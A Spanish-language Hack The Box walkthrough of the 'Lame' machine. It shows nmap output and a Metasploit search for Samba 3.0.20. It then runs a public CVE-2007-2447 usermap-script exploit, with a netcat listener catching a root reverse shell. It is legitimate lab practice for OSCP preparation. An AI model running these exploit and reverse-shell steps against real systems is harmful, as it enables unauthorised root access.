Después de un rato volví a hack the box, mi plan es hacer 26 boxes de preferencia sin metasploit (MSF) u otras herramientas automáticas antes de mi curso de OSCP para estar listo.

Hoy empecé con Lame, ya la había hecho hace mucho pero había usado MSF.

Como siempre empezamos con un nmap sC=default scripts sV dime las versiones

root@Kali2:~/Downloads# nmap -sC -sV
Starting Nmap 7.70 ( ) at 2019-10-15 14:04 CEST
Nmap scan report for
Host is up (0.018s latency).
Not shown: 996 filtered ports
21/tcp  open  ftp     	vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|  	Connected to
|  	Logged in as ftp
|  	No session bandwidth limit
|  	Session timeout in seconds is 300
|  	Control connection is plain text
|  	Data connections will be plain text
|  	vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh     	OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2d22h57m07s, deviation: 0s, median: -2d22h57m07s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-10-12T05:07:30-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 56.63 seconds

Buscamos en MSF con

msf5 > search samba 3.0.20

msf5 > search samba 3.0.20

Matching Modules

   #   Name                                               	Disclosure Date  Rank   	Check  Description
   -   ----                                               	---------------  ----   	-----  -----------
   1   auxiliary/admin/http/wp_easycart_privilege_escalation  2015-02-25   	normal 	Yes	WordPress WP EasyCart Plugin Privilege Escalation
   2   auxiliary/admin/smb/samba_symlink_traversal                         	normal 	No 	Samba Symlink Directory Traversal
   3   auxiliary/dos/samba/lsa_addprivs_heap                               	normal 	No 	Samba lsa_io_privilege_set Heap Overflow
   4   auxiliary/dos/samba/lsa_transnames_heap                             	normal 	No 	Samba lsa_io_trans_names Heap Overflow
   5   auxiliary/dos/samba/read_nttrans_ea_list                            	normal 	No 	Samba read_nttrans_ea_list Integer Overflow
   6   auxiliary/scanner/rsync/modules_list                                	normal 	Yes	List Rsync Modules
   7   auxiliary/scanner/smb/smb_uninit_cred                               	normal 	Yes	Samba _netr_ServerPasswordSet Uninitialized Credential State
   8   exploit/freebsd/samba/trans2open                   	2003-04-07   	great  	No 	Samba trans2open Overflow (*BSD x86)
   9   exploit/linux/samba/chain_reply                    	2010-06-16   	good   	No 	Samba chain_reply Memory Corruption (Linux x86)
   10  exploit/linux/samba/is_known_pipename              	2017-03-24   	excellent  Yes	Samba is_known_pipename() Arbitrary Module Load
   11  exploit/linux/samba/lsa_transnames_heap            	2007-05-14   	good   	Yes	Samba lsa_io_trans_names Heap Overflow
   12  exploit/linux/samba/setinfopolicy_heap             	2012-04-10   	normal 	Yes	Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   13  exploit/linux/samba/trans2open                     	2003-04-07   	great  	No 	Samba trans2open Overflow (Linux x86)
   14  exploit/multi/samba/nttrans                        	2003-04-07   	average	No 	Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   15  exploit/multi/samba/usermap_script                 	2007-05-14   	excellent  No 	Samba "username map script" Command Execution
   16  exploit/osx/samba/lsa_transnames_heap              	2007-05-14   	average	No 	Samba lsa_io_trans_names Heap Overflow
   17  exploit/osx/samba/trans2open                       	2003-04-07   	great  	No 	Samba trans2open Overflow (Mac OS X PPC)
   18  exploit/solaris/samba/lsa_transnames_heap          	2007-05-14   	average	No 	Samba lsa_io_trans_names Heap Overflow
   19  exploit/solaris/samba/trans2open                   	2003-04-07   	great  	No 	Samba trans2open Overflow (Solaris SPARC)
   20  exploit/unix/http/quest_kace_systems_management_rce	2018-05-31   	excellent  Yes	Quest KACE Systems Management Command Injection
   21  exploit/unix/misc/distcc_exec                      	2002-02-01   	excellent  Yes	DistCC Daemon Command Execution
   22  exploit/unix/webapp/citrix_access_gateway_exec     	2010-12-21   	excellent  Yes	Citrix Access Gateway Command Execution
   23  exploit/windows/fileformat/ms14_060_sandworm       	2014-10-14   	excellent  No 	MS14-060 Microsoft Windows OLE Package Manager Code Execution
   24  exploit/windows/http/sambar6_search_results        	2003-06-21   	normal 	Yes	Sambar 6 Search Results Buffer Overflow
   25  exploit/windows/license/calicclnt_getconfig        	2005-03-02   	average	No 	Computer Associates License Client GETCONFIG Overflow
   26  exploit/windows/smb/group_policy_startup           	2015-01-26   	manual 	No 	Group Policy Script Execution From Shared Resource
   27  post/linux/gather/enum_configs                                      	normal 	No 	Linux Gather Configurations

Checando los excelentes y con exploits disponibles podemos llegar fácilmente a este:

Para instalarlo es muy muy fácil

sudo apt install python python-pip
pip install --user pysmb
git clone

Sus opciones son:

$ python <RHOST> <RPORT> <LHOST> <LPORT>
RHOST -- The target address
RPORT -- The target port (TCP : 139)
LHOST -- The listen address
LPORT -- The listen port

Para tener root solo tienes que ejecutalro con un nc funcionando.

root@Kali2:~/CVE-2007-2447# python 139 3133
[*] CVE-2007-2447 - Samba usermap script
[+] Connecting !
[+] Payload was sent - check netcat !


root@Kali2:~/CVE-2007-2447# nc -lvnp 3133
listening on [any] 3133 ...
connect to [] from (UNKNOWN) [] 58029

Y ya esta 🙂 podemos leer las flags. Que en mi caso no me sirve porque ya las tenía.